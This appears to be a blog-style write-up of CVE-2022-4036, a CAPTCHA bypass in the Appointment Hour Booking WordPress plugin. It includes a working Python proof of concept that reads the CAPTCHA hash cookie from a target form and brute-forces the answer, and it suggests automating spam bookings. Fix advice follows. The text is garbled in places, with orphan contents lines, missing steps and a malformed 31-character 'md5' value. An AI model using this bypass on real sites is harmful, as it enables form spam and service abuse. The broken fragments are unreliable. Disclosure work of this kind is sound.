CVE-2022-4036 - How Weak CAPTCHA Security in WordPress Appointment Hour Booking Plugin Lets Attackers Bypass Your Forms

CVE-2022-4036 is a critical vulnerability in the Appointment Hour Booking plugin for WordPress (versions up to and including 1.3.72). If you use this plugin, your website’s appointment booking forms might be much less secure than you thought. In this long read, I’ll break down why this happens, show you how hackers can bypass CAPTCHA on your forms, and share code snippets and details, all using simple language.

What is the Appointment Hour Booking plugin?

This is a popular WordPress plugin that lets users book appointments online. It helps businesses schedule clients for services through a form on their website.

What’s the risk with CVE-2022-4036?

Attackers can easily get around the CAPTCHA that’s supposed to stop bots. Why? Because the plugin uses a weak way to hash (scramble) the CAPTCHA solution, then displays the hash in a cookie right back to the user’s browser. This makes it possible for anyone—including bots and bad actors—to figure out the correct CAPTCHA answer without solving it.

[Proof-of-Concept Exploit](#proof-of-concept-exploit)

5. [How to Fix/Protect Yourself](#how-to-fixprotect-yourself)

The vulnerability comes down to two main issues

1. Weak Hashing: The plugin uses a hashing function (like md5) to obfuscate the correct CAPTCHA answer. But md5 is considered very weak in security terms, and easy to reverse in many cases.

2. Leaking the Hash in a Cookie: After generating the CAPTCHA, the plugin sets a cookie on the user’s browser that contains the hash of the answer. An attacker can see this cookie.

See the hash in their browser cookies.

- Try possible answers very quickly (brute force), because the CAPTCHA value is usually a simple math operation (like “3 + 4”).

The attacker knows the CAPTCHA is a simple math problem, e.g., two numbers between 1 and 9.

4. The attacker tries all possible values (from 2 to 18). For each, they create an md5 hash and compare it to what’s in the cookie.

Code Snippet: How the CAPTCHA Break Works

Here’s a simple Python example that does what an attacker would do to “crack” the hash from the cookie and find the CAPTCHA answer:

import hashlib

# The value from your browser's cookies
hash_from_cookie = "081a18c68e1b935587e7bf2b59945f5"

# Try all possible sums (CAPTCHA usually like "A + B", A and B from 1-9)
for guess in range(2, 18+1):
    if hashlib.md5(str(guess).encode()).hexdigest() == hash_from_cookie:
        print(f"[+] The CAPTCHA answer is: {guess}")
        break

Just put the hash you see in the hash_from_cookie variable, and you’ll get the answer in one second.

Below is a basic proof-of-concept (PoC) using Python + requests to automate the attack

import requests
import hashlib

# URL of the booking form page
url = "https://target-site.com/booking-form/";

with requests.Session() as s:
    # Get the form page to receive cookies, including ahb_captcha
    r = s.get(url)
    cookies = s.cookies.get_dict()
    captcha_hash = cookies.get('ahb_captcha')

    # Find the real answer
    captcha_answer = None
    for guess in range(2, 19):
        if hashlib.md5(str(guess).encode()).hexdigest() == captcha_hash:
            captcha_answer = guess
            break

    if captcha_answer:
        print(f"[+] Found CAPTCHA answer: {captcha_answer}")
        # Now, use 'captcha_answer' in a POST to book an appointment
    else:
        print("[-] CAPTCHA answer not found!")

You could expand this by automatically submitting the booking form, bypassing the CAPTCHA validation, automating spam or unwanted appointments.


## How to Fix/Protect Yourself

1. Update Immediately: The plugin developer has fixed this in version 1.3.73 and above. Update the Appointment Hour Booking plugin right away.

2. Don’t Display Sensitive Data in Cookies: Developers should avoid putting any sensitive or security-relevant hashes or secrets in cookies visible to users.

3. Use Stronger CAPTCHA and Hashing: CAPTCHA should use more complex challenges and secure secrets (e.g., use a modern hash, but better, don’t leak it at all).

4. Monitor for Abnormal Bookings: Keep an eye on your booking logs for suspicious spikes or patterns.

Original References and Further Reading

- WPScan entry: CVE-2022-4036
- NVD vulnerability entry
- Plugin changelog and update notice
- Researcher report on the CAPTCHA bug

Wrap-up

CVE-2022-4036 is another reminder that even small mistakes in plugin code can open the door for mass spam, bots, and service abuse. If you use the Appointment Hour Booking plugin, update immediately. If you build plugins, never trust client-side data for verification—especially for things as important as CAPTCHA.

If you found this helpful, share it with your developer and WordPress admin friends!

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 07/10/2023 18:45:00 UTC